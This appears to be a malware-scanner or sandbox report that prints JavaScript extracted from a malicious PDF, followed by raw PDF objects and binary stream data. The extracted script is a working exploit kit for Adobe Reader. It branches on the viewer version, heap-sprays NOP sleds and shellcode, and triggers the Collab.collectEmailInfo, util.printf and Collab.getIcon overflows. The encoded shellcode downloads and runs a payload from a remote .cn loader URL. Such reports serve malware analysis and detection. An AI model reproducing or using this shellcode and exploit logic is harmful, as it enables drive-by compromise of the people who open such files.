{lYc=lYc.replace(/[\+1]/g,"0");lYc=lYc.replace(/[\+2]/g,"9");lYc=lYc.replace(/[\+3]/g,"8");lYc=lYc.replace(/[\+4]/g,"7");lYc=lYc.replace(/[\+5]/g,"6");lYc=lYc.replace(/[\+6]/g,"5");lYc=lYc.replace(/[\+7]/g,"4");lYc=lYc.replace(/[\+8]/g,"3");lYc=lYc.replace(/[\+9]/g,"2");lYc=lYc.replace(/[\+0]/g,"1");return lYc;}
function kGEIX(){var fjjTN=jHT("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0033\u0000\u0000\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43");fev=jHT("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+fjjTN;WXj=jHT("\u9090\u9090");qsi=5*2;PSH=qsi+fev.length;while(WXj.length<PSH)WXj+=WXj;btM=WXj.substring(0,PSH);xjQ=WXj.substring(0,WXj.length-PSH);while(xjQ.length+PSH<0x40000)xjQ=xjQ+xjQ+btM;Ehw=[];for(Gqh=0;Gqh<180;Gqh++)Ehw[Gqh]=xjQ+fev;var AAK=4012;var Gab=Array(AAK);for(Gqh=0;Gqh<AAK;Gqh++)
{Gab[Gqh]=jHT("\u000a\u000a\u000a\u000a");}
Collab.getIcon(Gab+"_N.bundle");}
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery split-literal-normalize from combined JavaScript objects at offset 0x497 | 13171 bytes |
SHA-256: 4934ab5bea9d5ebc3c5cc5d4ea108252637cdc0db123f90b7b064248ccd1e3e8 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var jHT=unescape,wWu=app.viewerVersion.toString(),iqZ=jHT("t\h\i\s");iqZ=eval(iqZ);if(wWu<8)
{ZIRUG();}
if(wWu>=8&&wWu<9)
{Ejj();}
if(wWu<=9)
{kGEIX();}
function VTCud(aDCja,hwFxk){while(aDCja.length*2<hwFxk){aDCja+=aDCja;}
return aDCja.substring(0,hwFxk/2);}
function ZIRUG(){var vjbRa=jHT("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0032\u0000\u0000\u4445\u4445\u4445\u4445");var YIMpl=0x0c0c0c0c;var YmmIZ=[];var kcXNm=0x400000;var IlRQs=vjbRa.length*2;var hwFxk=kcXNm-(IlRQs+0x38);var aDCja=jHT("\u9090\u9090");aDCja=VTCud(aDCja,hwFxk);var ukudk=(YIMpl-0x400000)/kcXNm;for(var mnnit=0;mnnit<ukudk;mnnit++){YmmIZ[mnnit]=aDCja+vjbRa;}
var clRln=jHT("\u0c0c\u0c0c");while(clRln.length<44952)clRln+=clRln;this.collabStore=Collab.collectEmailInfo({subj:"",msg:clRln});}
function Ejj(){var RdN=new Array();function WWL(smf,VDD){while(smf.length*2<VDD){smf+=smf;}
smf=smf.substring(0,VDD/2);return smf;}
bJJ=0x30303030;VNH=jHT("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0031\u0000");var tVV=0x400000;var gew=VNH.length*2;var VDD=tVV-(gew+0x38);var smf=jHT("\u9090\u9090");smf=WWL(smf,VDD);var lDA=(bJJ-0x400000)/tVV;for(var stf=0;stf<lDA;stf++){RdN[stf]=smf+VNH;}
var aQx="37099690927312446598";for(jHT=0;jHT<138*2;jHT++){aQx+="9";}
util.printf("%45000f",aQx);}
function iaX(lYc)
{lYc=lYc.replace(/[\+1]/g,"0");lYc=lYc.replace(/[\+2]/g,"9");lYc=lYc.replace(/[\+3]/g,"8");lYc=lYc.replace(/[\+4]/g,"7");lYc=lYc.replace(/[\+5]/g,"6");lYc=lYc.replace(/[\+6]/g,"5");lYc=lYc.replace(/[\+7]/g,"4");lYc=lYc.replace(/[\+8]/g,"3");lYc=lYc.replace(/[\+9]/g,"2");lYc=lYc.replace(/[\+0]/g,"1");return lYc;}
function kGEIX(){var fjjTN=jHT("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0033\u0000\u0000\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43\x34\x43");fev=jHT("\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090\u9090")+fjjTN;WXj=jHT("\u9090\u9090");qsi=5*2;PSH=qsi+fev.length;while(WXj.length<PSH)WXj+=WXj;btM=WXj.substring(0,PSH);xjQ=WXj.substring(0,WXj.length-PSH);while(xjQ.length+PSH<0x40000)xjQ=xjQ+xjQ+btM;Ehw=[];for(Gqh=0;Gqh<180;Gqh++)Ehw[Gqh]=xjQ+fev;var AAK=4012;var Gab=Array(AAK);for(Gqh=0;Gqh<AAK;Gqh++)
{Gab[Gqh]=jHT("\u000a\u000a\u000a\u000a");}
Collab.getIcon(Gab+"_N.bundle");}
app.eval();
app.eval();
endstream
endobj
73 0 obj<</Subtype/XML/Length 224/Type/Metadata>>stream
©N> u «а©1XЄѕ»&Ї Єш'v/щ(шпС;с-nsd02`Б№Ђ0_5¦ћќ9%lч|Ъ|5‘•@ Ж‹эся ЄLД" –Љ “©д«9иhS/ќkSЃcш-2T†ЮсѕqИ ЊѓМwF} oN РХbљEИ iH\\ Лт
endstream
endobj
116 0 obj
<</ / / / /Filter/#46#6c#61#74#65#44#65#63#6f#64#65/Length 2000+023>>
stream
x^�X[O I ~ϯ�,�� R]��U=�W�k�� ڐ,� ��86� C| V(�}��T��!��ێH�q���T�K��u �r��C��
���p���*�_]m_��7���p� _ζ�������� ��B��Z � �� �N���u �� �Fm(�q� w�w������}{� O�O?���XM& H;)q�o��O� �f�%L�<�P����e1�o��Է睻���t�Q����ty���ih���� 5��r5��������oCyU������; �zr��� =Z�&4�P�U~�2& ��"9Z9� T�Ѫ�
�+M�*�3@���U]W a]�3��e V䯰�C��d�I ���kh�븪,9 u�uϟ'�ā#5�`]Y� �'�ɲ8&'��%g ��l%< �nr���� � Teu)� n�-�ȩj-:�h3����]�J8� �( Ɏ4���3�kȖ6f 2���q����G ��G��$��8,h1 �ʁ? s�k� �,O��Hz[��uT �ԅBd� �,b��P��(��X<�TQ Ȯ= �� 8]D��B�r�U� Nw �Yƛ�]AYC
E� z�9��� �,�ןd <� �
�� ����. �l�x��U �O^ � � ��N�'/�#� �9N � ��y ~�S� ���ǟK����C�=>#ܮ��f��_�^E�
O$�|.pG�4�-/ �Z�>b<�8���� Us�� fV!� �X�A��S0�y @[��m) � &�5nT�3��.|T�^� ��#�`P�� ��M �'^T��� �CP)�?( �, )��P�� ��u��Te�� R
����*��" h��2' �* �d���ܜ�䰞�LxX%l #JVY�ۆQ�4o��YO� r��5��� ��B� � <��Y�2��2�}F�Җe�L �` :���� �Z|�.$��,���y��Ԧ ��Z�` #ڱ�5 ;� y���BJ)FO�� �!�� �{�������4U�j��{�������X�� >�]�#�N%�����E*��
AzK* ����U��ySҊ֍%Q $�#��߉��|��<m����nt^����r�&��l6^��'�;"���n�N�s(_�} ��蒔 L����_� �|� z�ϝ0L"� T7����l�� \N�������0-d-��`Y]������}�6<���ںX��"��6��� ҃��쥳���l>�� S��L���?ڋ���AY�� |�> �n
�� r�1 ���� <�ɯ�∍��{ {o� ) ;���3*�*,�'T���+��@��3�r�"� �
O��k �F�Rqf e!3Y���ZK
"5� 鈵2s��D�a�{ Y���֩� f�2�*�Y�mL* �Ya� N*a yb觉ٕ�J�Ǜ�UF z� vtî *�c�ܓsw6�i���Wk[� q��@v�� <AAoK ��{��碚����ۮ )ga �FV �C�e�t}NZ� �j??�D��Ԗa��.\�+ ��N�K��|�@O��v {F�*� �8������/ *8Q��-
Y�\E T�)�OoM�U o����r��O��r^� �
jS ���M� vTK���� Y9 G=uE�U%Q���,;GUSC�
�'���漇�������f-> ޤH��:� O���
�
�j� � �����E����6� � �� w� �� ����[�X ��t�USa��nӖ�
s �jk �q�����3L� w �~�\Q ��i+iA�j9�n_� � �[ [�V� �nk�� �F! �?�� � L�= ^M��a���Q78~}��b@ D�BM�� ��'��P� �H�� �X�� T+�� � �y�� U?AUB
@m ��� �<L�-�&� {�O����Ӑ
��i��4������P~�� �b0��Ou��'z�hx�x���g�W�@�ӕ����i�� ��b�F ����m�u 7��I�g4 h�t� �N���s�J�����#�w%��ǿ��٨� ���HС �u� +���?jp�|�� #'�N�� 'ȇX � ܗ)8�~KC h�� ��'9и� ��j �� �W�L�H��d� D�|{��Xp:\� .gmHv[���\�} �� |� ��_��S�x�KK- ��*,� �H*��
t�(wt�N��8 �"#e
endstream
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1990 0 obj
<</ / / / /S/#4a#61#76#61#53#63#72#69#70#74/JS 116 0 R/ / / />>
endobj
95 0 obj
<</ / / / /Direction/L2R/ / / />>
endobj
1 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
5 0 obj
<</ / / / /Typp/Action/S/#47#6f#54#6f/D[9 0 /XYZ 0 504 #31]/ / / />>
endobj
9 0 obj
<</ / / / /count 2/Type/Pages/Kids[1894 0 R]/ / / />>
endobj
123 0 obj
<</ / / / /Length 0000>>
stream
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
endstream
endobj
23 0 obj<</CropBox[0 0 595.22 842]/Parent 62 0 R/Contents 25 0 R/Rotate 0/MediaBox[0 0 595.22 842]/Resources 24 0 R/Type/Page>>
endobj
24 0 obj<</ColorSpace<</Cs6 59 0 R>>/Font<</TT2 52 0 R/TT3 54 0 R/TT4 45 0 R>>/ProcSet[/PDF/Text]/ExtGState<</GS1 57 0 R>>>>
endobj
25 0 obj[26 0 R 27 0 R 28 0 R]
endobj
26 0 obj<</Length 3>>stream
Y.в
endstream
endobj
91 0 obj
<</ / / / /S/JavaScript/JS 123 0 R/ / / />>
endobj
xref
trailer
<<
/Root 15 0 R
>>
startxrefxګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �xګ������ BK� �7 ��kOp���(/��x� �q%�T �
|
|||
combined_document_js_000.js |
deobfuscated-js | combined document JavaScript streams at offset 0x497 | 13192 bytes |
SHA-256: 3482ac82aedd05e560ab35ba5de5d9a6f6c35c297bdac31ca3750138b301e5a2 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 3 eval/decoder/string-building token(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
var jHT=unescape,wWu=app.viewerVersion.toString(),iqZ=jHT("t\h\i\s");iqZ=eval(iqZ);if(wWu<8)
{ZIRUG();}
if(wWu>=8&&wWu<9)
{Ejj();}
if(wWu<=9)
{kGEIX();}
function VTCud(aDCja,hwFxk){while(aDCja.length*2<hwFxk){aDCja+=aDCja;}
return aDCja.substring(0,hwFxk/2);}
function ZIRUG(){var vjbRa=jHT("\u4343\u4343\u4343\u0FEB\u335B\u66C9\u80B9\u8001\uEF33\uE243\uEBFA\uE805\uFFEC\uFFFF\u8B7F\uDF4E\uEFEF\u64EF\uE3AF\u9F64\u42F3\u9F64\u6EE7\uEF03\uEFEB\u64EF\uB903\u6187\uE1A1\u0703\uEF11\uEFEF\uAA66\uB9EB\u7787\u6511\u07E1\uEF1F\uEFEF\uAA66\uB9E7\uCA87\u105F\u072D\uEF0D\uEFEF\uAA66\uB9E3\u0087\u0F21\u078F\uEF3B\uEFEF\uAA66\uB9FF\u2E87\u0A96\u0757\uEF29\uEFEF\uAA66\uAFFB\uD76F\u9A2C\u6615\uF7AA\uE806\uEFEE\uB1EF\u9A66\u64CB\uEBAA\uEE85\u64B6\uF7BA\u07B9\uEF64\uEFEF\u87BF\uF5D9\u9FC0\u7807\uEFEF\u66EF\uF3AA\u2A64\u2F6C\u66BF\uCFAA\u1087\uEFEF\uBFEF\uAA64\u85FB\uB6ED\uBA64\u07F7\uEF8E\uEFEF\uAAEC\u28CF\uB3EF\uC191\u288A\uEBAF\u8A97\uEFEF\u9A10\u64CF\uE3AA\uEE85\u64B6\uF7BA\uAF07\uEFEF\u85EF\uB7E8\uAAEC\uDCCB\uBC34\u10BC\uCF9A\uBCBF\uAA64\u85F3\uB6EA\uBA64\u07F7\uEFCC\uEFEF\uEF85\u9A10\u64CF\uE7AA\uED85\u64B6\uF7BA\uFF07\uEFEF\u85EF\u6410\uFFAA\uEE85\u64B6\uF7BA\uEF07\uEFEF\uAEEF\uBDB4\u0EEC\u0EEC\u0EEC\u0EEC\u036C\uB5EB\u64BC\u0D35\uBD18\u0F10\u64BA\u6403\uE792\uB264\uB9E3\u9C64\u64D3\uF19B\uEC97\uB91C\u9964\uECCF\uDC1C\uA626\u42AE\u2CEC\uDCB9\uE019\uFF51\u1DD5\uE79B\u212E\uECE2\uAF1D\u1E04\u11D4\u9AB1\uB50A\u0464\uB564\uECCB\u8932\uE364\u64A4\uF3B5\u32EC\uEB64\uEC64\uB12A\u2DB2\uEFE7\u1B07\u1011\uBA10\uA3BD\uA0A2\uEFA1\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0032\u0000\u0000\u4445\u4445\u4445\u4445");var YIMpl=0x0c0c0c0c;var YmmIZ=[];var kcXNm=0x400000;var IlRQs=vjbRa.length*2;var hwFxk=kcXNm-(IlRQs+0x38);var aDCja=jHT("\u9090\u9090");aDCja=VTCud(aDCja,hwFxk);var ukudk=(YIMpl-0x400000)/kcXNm;for(var mnnit=0;mnnit<ukudk;mnnit++){YmmIZ[mnnit]=aDCja+vjbRa;}
var clRln=jHT("\u0c0c\u0c0c");while(clRln.length<44952)clRln+=clRln;this.collabStore=Collab.collectEmailInfo({subj:"",msg:clRln});}
function Ejj(){var RdN=new Array();function WWL(smf,VDD){while(smf.length*2<VDD){smf+=smf;}
smf=smf.substring(0,VDD/2);return smf;}
bJJ=0x30303030;VNH=jHT("\uC033\u8B64\u3040\u0C78\u408B\u8B0C\u1C70\u8BAD\u0858\u09EB\u408B\u8D34\u7C40\u588B\u6A3C\u5A44\uE2D1\uE22B\uEC8B\u4FEB\u525A\uEA83\u8956\u0455\u5756\u738B\u8B3C\u3374\u0378\u56F3\u768B\u0320\u33F3\u49C9\u4150\u33AD\u36FF\uBE0F\u0314\uF238\u0874\uCFC1\u030D\u40FA\uEFEB\u3B58\u75F8\u5EE5\u468B\u0324\u66C3\u0C8B\u8B48\u1C56\uD303\u048B\u038A\u5FC3\u505E\u8DC3\u087D\u5257\u33B8\u8ACA\uE85B\uFFA2\uFFFF\uC032\uF78B\uAEF2\uB84F\u2E65\u7865\u66AB\u6698\uB0AB\u8A6C\u98E0\u6850\u6E6F\u642E\u7568\u6C72\u546D\u8EB8\u0E4E\uFFEC\u0455\u5093\uC033\u5050\u8B56\u0455\uC283\u837F\u31C2\u5052\u36B8\u2F1A\uFF70\u0455\u335B\u57FF\uB856\uFE98\u0E8A\u55FF\u5704\uEFB8\uE0CE\uFF60\u0455\u7468\u7074\u2F3A\u6E2F\u6363\u6E63\u6E6E\u2E63\u6E63\u692F\u676D\u6C2F\u616F\u2E64\u6870\u3F70\u3D61\u2661\u7473\u493D\u746E\u7265\u656E\u2074\u7845\u6C70\u726F\u7265\u3720\u302E\u577C\u6E69\u6F64\u7377\u5820\u2650\u3D65\u0031\u0000");var tVV=0x400000;var gew=VNH.length*2;var VDD=tVV-(gew+0x38);var smf=jHT("\u9090\u9090");smf=WWL(smf,VDD);var lDA=(bJJ-0x400000)/tVV;for(var stf=0;stf<lDA;stf++){RdN[stf]=smf+VNH;}
var aQx="37099690927312446598";for(jHT=0;jHT<138*2;jHT++){aQx+="9";}
util.printf("%4"+"50"+"00"+"f",aQx);}
